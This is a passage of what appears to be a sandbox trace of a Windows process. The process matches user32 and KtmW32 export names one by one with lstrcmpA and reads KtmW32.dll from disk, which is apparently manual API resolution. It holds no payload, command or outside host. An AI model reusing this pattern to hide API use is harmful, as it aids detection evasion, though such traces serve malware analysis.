(lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0253.120] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0253.121] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0253.122] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0253.122] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0253.122] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0253.122] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0253.122] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0253.122] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0253.122] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0253.122] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0253.122] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0253.122] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0253.122] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0253.123] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0253.124] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0253.125] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0253.248] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0253.248] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0253.249] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0253.853] GetProcessHeap () returned 0x430000 [0253.854] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4050040 | out: hHeap=0x430000) returned 1 [0253.861] GetProcessHeap () returned 0x430000 [0253.861] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449a40 [0253.862] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0254.085] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0254.085] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0254.086] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0254.086] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0254.086] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0254.086] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0254.086] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0254.086] GetProcessHeap () returned 0x430000 [0254.086] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5e00) returned 0x2c95030 [0254.086] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0254.086] ReadFile (in: hFile=0x17c, lpBuffer=0x2c95030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c95030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0254.087] CloseHandle (hObject=0x17c) returned 1 [0254.087] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0254.087] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0254.087] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0254.087] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0254.087] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0254.087] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0254.087] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0254.087] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0254.087] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0254.088] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0254.088] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0254.088] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0254.088] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0254.088] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0254.088] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0254.088] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0254.088] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0254.088] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0254.088] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0254.088] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0254.088] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0254.088] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0254.088] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0254.089] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0254.089] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0254.089] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0254.089] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0254.089] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0254.089] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0254.089] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0254.089] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0254.089] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0254.089] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0254.089] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0254.089] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0254.089] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0254.089] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0254.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0254.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0254.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0254.091] 